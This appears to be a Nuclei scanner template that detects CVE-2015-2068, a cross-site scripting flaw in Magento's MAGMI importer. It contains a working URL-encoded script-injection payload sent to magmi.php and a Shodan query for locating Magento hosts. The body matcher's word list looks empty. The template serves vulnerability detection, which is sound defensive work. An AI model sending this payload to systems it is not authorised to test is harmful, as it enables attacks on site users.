id: CVE-2015-2068 info: name: Magento Server Mass Importer - Cross-Site Scripting author: daffainfo severity: medium description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected Magento server. remediation: | Apply the latest security patches provided by Magento to fix the XSS vulnerability in the Server Mass Importer module. reference: - https://www.exploit-db.com/exploits/35996 - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2015-2068 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-2068 cwe-id: CWE-79 epss-score: 0.00146 epss-percentile: 0.4958 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: verified: true max-request: 1 vendor: magmi_project product: magmi framework: magento_server shodan-query: http.component:"Magento" tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server http: - method: GET path: - '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a0047304502201d5b527a7afaf9cd2298eecea9050abd7eb528161ddd9c8f6b3bb07fd1b3d401022100bc96b4607561b72a7ff1ebefd67594db87f556150aef7cee914c442f33c921bd:922c64590222798bb761d5b6d8e72950